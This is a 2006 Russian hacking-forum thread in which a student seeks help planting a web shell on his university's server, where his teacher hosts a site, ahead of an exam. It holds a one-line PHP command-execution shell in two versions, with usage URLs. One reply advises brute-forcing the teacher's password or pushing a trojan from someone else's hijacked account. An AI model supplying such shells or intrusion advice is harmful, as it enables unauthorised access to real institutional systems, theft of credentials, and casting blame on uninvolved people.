Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Сайт университета (https://forum.antichat.xyz/showthread.php?t=16815)

alex-19841 31.03.2006 11:08

Сайт университета
 
Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт.
Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы.
Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет.
Также пробовал залить самодельный шелл shell.php
в нем:
<? system($_GET[c]); ?>
Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает
<? system($_GET[c]); ?>
Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied.
"Назад к учителю" У него сайт простой из html никаких скриптов.
Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю.
Извините но полный адрес сайта учителя дать не могу.
Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин.
Зарание спасибо.

Utochka 31.03.2006 13:07

дык наверное надо его юзать так
http://www.xxx.com/shell.php?c=id
или
http://www.xxx.com/shell.php&c=id
)

NeMiNeM 01.04.2006 13:32

Ты уверен что на серваке есть поддержка Php?

NaX[no]rT 01.04.2006 15:01

а по твоему ) как оно тогда залило?)

SanyaX 01.04.2006 19:13

Через html можно тоже заливать.

Utochka 01.04.2006 19:16

Цитата:

Сообщение от NaX[no]r†
как оно тогда залило?)

Прикольно сказал

koi8-r 01.04.2006 19:26

попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...

A110ut 01.04.2006 20:03

Попробуй вот так:

<?php system($_GET['c']); ?>

Пример использования (для винды) => xttp://site/shell.php?c=dir

NeMiNeM 01.04.2006 20:09

Цитата:

Сообщение от NaX[no]r†
а по твоему ) как оно тогда залило?)

Ыыы, поспешил=)) прочитал только что r57shell.php не залился, до конца не дочитав пост=(

Tem 01.04.2006 23:10

Цитата:

ACCESS Denied.
Вроде бы доступ ограничен.


Время: 04:08